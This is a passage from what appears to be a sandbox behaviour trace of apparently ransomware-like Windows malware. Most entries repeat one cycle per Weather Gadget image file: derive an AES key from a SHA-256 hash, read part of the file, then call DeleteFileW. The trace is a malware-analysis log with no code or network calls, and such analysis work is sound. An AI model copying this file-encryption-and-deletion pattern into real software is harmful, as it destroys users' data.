hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.490] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x558a [0196.490] ReadFile (in: hFile=0x5d4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.494] CryptDestroyHash (hHash=0x284d528) returned 1 [0196.494] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.494] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.495] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-new.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-new.png")) returned 0 [0196.496] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.496] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.496] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.497] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.497] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6ae6 [0196.497] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.500] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0196.500] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.500] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.502] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-new_partly-cloudy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-new_partly-cloudy.png")) returned 0 [0196.502] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.502] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.502] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.503] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.503] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4d81 [0196.503] ReadFile (in: hFile=0x5d4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.506] CryptDestroyHash (hHash=0x284d528) returned 1 [0196.506] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.506] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.507] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-crescent.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waning-crescent.png")) returned 0 [0196.508] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.509] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.509] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.509] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.509] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6469 [0196.509] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.519] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0196.519] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.519] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.520] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-crescent_partly-cloudy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waning-crescent_partly-cloudy.png")) returned 0 [0196.520] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.521] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.521] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.521] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.521] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b87 [0196.521] ReadFile (in: hFile=0x5d4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.562] CryptDestroyHash (hHash=0x284d528) returned 1 [0196.562] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.562] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.563] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-gibbous.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waning-gibbous.png")) returned 0 [0196.599] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.600] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.600] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.600] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.600] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x62fb [0196.600] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.613] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0196.613] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.613] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.615] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waning-gibbous_partly-cloudy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waning-gibbous_partly-cloudy.png")) returned 0 [0196.615] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.616] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.616] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.616] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.616] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4dd3 [0196.616] ReadFile (in: hFile=0x5d4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.619] CryptDestroyHash (hHash=0x284d528) returned 1 [0196.619] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.619] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.621] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-crescent.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waxing-crescent.png")) returned 0 [0196.622] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.622] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.622] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.622] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.622] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6455 [0196.622] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.632] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0196.632] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.632] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.633] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-crescent_partly-cloudy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waxing-crescent_partly-cloudy.png")) returned 0 [0196.634] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.634] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.634] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.634] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.634] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4c50 [0196.635] ReadFile (in: hFile=0x5d4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.638] CryptDestroyHash (hHash=0x284d528) returned 1 [0196.638] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.638] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.639] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-gibbous.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waxing-gibbous.png")) returned 0 [0196.641] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.642] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.642] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.642] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.642] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6222 [0196.642] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.645] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0196.645] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.645] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.647] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-gibbous_partly-cloudy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waxing-gibbous_partly-cloudy.png")) returned 0 [0196.741] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.741] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.741] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.741] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.741] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x94ed [0196.741] ReadFile (in: hFile=0x5d4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.749] CryptDestroyHash (hHash=0x284d528) returned 1 [0196.749] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.749] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.750] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_rainy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_rainy.png")) returned 0 [0196.751] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.752] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.752] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.752] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.752] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x918c [0196.752] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.756] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0196.756] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.756] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.758] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_snow.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_snow.png")) returned 0 [0196.758] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.759] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.759] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.759] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.759] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7a40 [0196.759] ReadFile (in: hFile=0x5d4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.763] CryptDestroyHash (hHash=0x284d528) returned 1 [0196.763] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.763] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.765] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_thunderstorm.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_thunderstorm.png")) returned 0 [0196.766] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.767] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.767] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.767] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.767] GetFileSize (in: hFile=0x5b0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9c38 [0196.767] ReadFile (in: hFile=0x5b0, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.772] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0196.772] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.772] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.776] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_windy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_windy.png")) returned 0 [0196.776] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.777] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.777] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.777] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.777] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6add [0196.777] ReadFile (in: hFile=0x5d4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.781] CryptDestroyHash (hHash=0x284d528) returned 1 [0196.781] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.781] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.783] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_partly-cloudy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_blue_partly-cloudy.png")) returned 0 [0196.784] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.784] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.784] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.785] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.785] GetFileSize (in: hFile=0x5dc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa3cc [0196.785] ReadFile (in: hFile=0x5dc, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.789] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0196.789] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.789] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.791] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_snow.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_blue_snow.png")) returned 0 [0196.791] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.792] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.792] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.792] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.792] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8f5e [0196.792] ReadFile (in: hFile=0x5d4, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.796] CryptDestroyHash (hHash=0x284d528) returned 1 [0196.796] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.796] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.797] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_sun.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_blue_sun.png")) returned 0 [0196.798] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.799] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.799] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.799] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.799] GetFileSize (in: hFile=0x5dc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbc54 [0196.799] ReadFile (in: hFile=0x5dc, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0196.803] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0196.803] CryptDestroyKey (hKey=0x284d568) returned 1 [0196.803] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0196.805] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_windy.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_blue_windy.png")) returned 0 [0196.805] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0196.806] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0196.806] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0196.806] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d568) returned 1 [0196.806] GetFileSize (in: hFile=0x5d4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8184 [0196.806] ReadFile (in: 